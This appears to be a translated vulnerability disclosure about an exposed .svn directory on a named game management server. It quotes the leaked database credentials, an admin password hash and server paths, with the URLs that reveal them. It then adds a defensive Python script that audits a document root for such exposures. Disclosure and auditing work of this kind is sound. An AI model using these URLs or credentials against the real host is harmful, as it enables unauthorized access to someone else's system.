Sensitive information in a GM system was leaked; the starting point was an exposed .svn directory:
http://qa.tank.duowan.com/manage/.svn/entries
The svn metadata did not show what files exist, but it did reveal the approximate directory layout. After a long time spent requesting files directly, the source code turned out to be exposed: http://qa.tank.duowan.com/manage/sql/dbcfg.py
HOST = '2017.0.0.1'
USER = 'tkgame'
PAWD = 'tkgame'
PORT = 0
DBNAME = 'tkt_manage'
#
EXECUTETYPE = 'Update'
BUILDSQL = 'table_defines.sql'
UPDATELOG = 'update.ini'
UPDATETABLE = '_db_update_log'
BUILDUPDATESQL = '_db_update_log.sql'
BACKUPSQLPREFIX = 'bk_'
Proof of vulnerability:
http://qa.tank.duowan.com/manage/sql/table_defines.sql
INSERT INTO `user` (`user_id`, `user_name`, `user_password`, `user_level`, `user_created`) VALUES
(1, 'sixcube', '6511383c766f89361b27f1d0d4f25956', 2, 1338946866);
http://qa.tank.duowan.com/manage/i18n/config.sh
ROOT_PATH=/var/www/wwwroot/tkt/manage
I18N_PATH=$ROOT_PATH/i18n
I18N_DOMAIN=tkt_manage
LANG_LIST=(`/usr/bin/php -q getLangList.php`);
LEN_OF_LANG_LIST=${#LANG_LIST[@]}
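
A pre-deploy check for the kind of exposure described above, as an added example that is not part of the original report: it walks a local document root and flags version-control metadata plus source or config files that a web server would hand out as plain text. The extension list, the key-name pattern and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

VCS_DIRS = {".svn", ".git", ".hg"}
# Extensions assumed to be served as plain text by a PHP-only vhost.
SOURCE_EXTS = {".py", ".sh", ".sql", ".ini"}
# A credential-looking assignment such as PAWD = '...' (assumed key names).
SECRET_RE = re.compile(r"^\s*\w*(?:PASS|PAWD|PWD|SECRET)\w*\s*=\s*\S", re.I | re.M)


def audit_docroot(root):
    """Return sorted (relative_path, reason) findings under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in [d for d in dirnames if d in VCS_DIRS]:
            findings.append((os.path.relpath(os.path.join(dirpath, d), root), "vcs-metadata"))
            dirnames.remove(d)  # do not descend into the metadata itself
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in SOURCE_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                text = fh.read(65536)
            reason = "credentials-in-source" if SECRET_RE.search(text) else "source-as-text"
            findings.append((os.path.relpath(path, root), reason))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample mirroring the directory layout in the report."""
    files = {
        ".svn/entries": "10\n",
        "sql/dbcfg.py": "USER = 'example'\nPAWD = 'example'\n",
        "sql/table_defines.sql": "CREATE TABLE t (id INT);\n",
        "i18n/config.sh": "I18N_DOMAIN=example\n",
        "index.php": "<?php echo 'ok';\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(*audit_docroot(tmp), sep="\n")
```

Any finding means the deploy step should export a clean copy (for example with svn export) or the server should deny those paths before the tree goes live.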